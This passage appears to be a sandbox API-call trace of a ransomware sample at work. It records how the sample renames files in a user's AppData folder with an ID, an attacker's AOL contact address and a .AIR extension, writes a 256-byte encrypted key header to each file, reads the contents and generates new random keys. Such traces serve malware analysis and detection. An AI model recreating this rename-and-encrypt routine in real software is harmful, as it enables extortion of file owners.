	[0105.829] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.829] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pl9elqofcmp 8cr56s.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pl9elqofcmp 8cr56s.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.832] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pl9elqofcmp 8cr56s.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.832] GetProcessHeap () returned 0x540000
	[0105.832] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56efb8 | out: hHeap=0x540000) returned 1
	[0105.832] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=86412) returned 1
	[0105.832] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1518c
	[0105.833] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.833] GetProcessHeap () returned 0x540000
	[0105.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.833] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.833] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.834] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.834] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.834] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x1518c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1518c, lpOverlapped=0x0) returned 1
	[0105.836] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.836] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.836] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi", dwFileAttributes=0x80) returned 1
	[0105.837] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi") returned 55
	[0105.837] GetProcessHeap () returned 0x540000
	[0105.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x601bd0
	[0105.837] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi"
	[0105.837] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.837] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ocxy.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ocxy.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.840] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OcXY.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ocxy.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.840] GetProcessHeap () returned 0x540000
	[0105.840] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0105.840] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=67805) returned 1
	[0105.840] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x108dd
	[0105.840] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.840] GetProcessHeap () returned 0x540000
	[0105.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.840] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.842] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.843] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.843] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.844] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x108dd, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x108dd, lpOverlapped=0x0) returned 1
	[0105.845] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.845] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.845] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv", dwFileAttributes=0x80) returned 1
	[0105.846] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv") returned 69
	[0105.846] GetProcessHeap () returned 0x540000
	[0105.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf0) returned 0x56b448
	[0105.846] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv"
	[0105.846] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.846] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\neuf1yaxz-rwxuqp f.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\neuf1yaxz-rwxuqp f.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.853] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NEuf1yaxz-rWXuqP f.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\neuf1yaxz-rwxuqp f.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.853] GetProcessHeap () returned 0x540000
	[0105.853] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0105.853] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=82060) returned 1
	[0105.853] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1408c
	[0105.853] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.853] GetProcessHeap () returned 0x540000
	[0105.853] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.853] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.855] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.856] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.856] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.856] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x1408c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1408c, lpOverlapped=0x0) returned 1
	[0105.859] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.859] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.859] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf", dwFileAttributes=0x80) returned 1
	[0105.859] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf") returned 66
	[0105.859] GetProcessHeap () returned 0x540000
	[0105.859] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x56b448
	[0105.859] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf"
	[0105.860] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.860] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mmdd cqwftgm4sh.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mmdd cqwftgm4sh.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.863] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mmdd cqWFTgm4Sh.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mmdd cqwftgm4sh.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.863] GetProcessHeap () returned 0x540000
	[0105.863] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0105.863] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=27669) returned 1
	[0105.863] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x6c15
	[0105.863] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.863] GetProcessHeap () returned 0x540000
	[0105.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.863] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.865] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.866] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.866] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.866] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x6c15, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x6c15, lpOverlapped=0x0) returned 1
	[0105.867] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.867] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.867] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf", dwFileAttributes=0x80) returned 1
	[0105.868] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf") returned 70
	[0105.868] GetProcessHeap () returned 0x540000
	[0105.868] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf2) returned 0x597dc8
	[0105.868] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf"
	[0105.868] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.868] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kmvw_gx-j4wzwqjmcla.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kmvw_gx-j4wzwqjmcla.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.871] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KmVw_gx-j4WzwqJmCla.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kmvw_gx-j4wzwqjmcla.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.871] GetProcessHeap () returned 0x540000
	[0105.871] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0105.871] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=102210) returned 1
	[0105.871] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x18f42
	[0105.871] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.871] GetProcessHeap () returned 0x540000
	[0105.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.872] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.872] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.873] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.873] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.873] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x18f42, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x18f42, lpOverlapped=0x0) returned 1
	[0105.876] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.876] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.876] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a", dwFileAttributes=0x80) returned 1
	[0105.877] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a") returned 62
	[0105.877] GetProcessHeap () returned 0x540000
	[0105.877] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe2) returned 0x57fb28
	[0105.877] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a"
	[0105.877] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.877] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jkkwqu3avwy.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jkkwqu3avwy.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.880] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JKKwQu3AVwy.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jkkwqu3avwy.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.881] GetProcessHeap () returned 0x540000
	[0105.881] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0105.881] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=100243) returned 1
	[0105.881] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x18793
	[0105.881] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
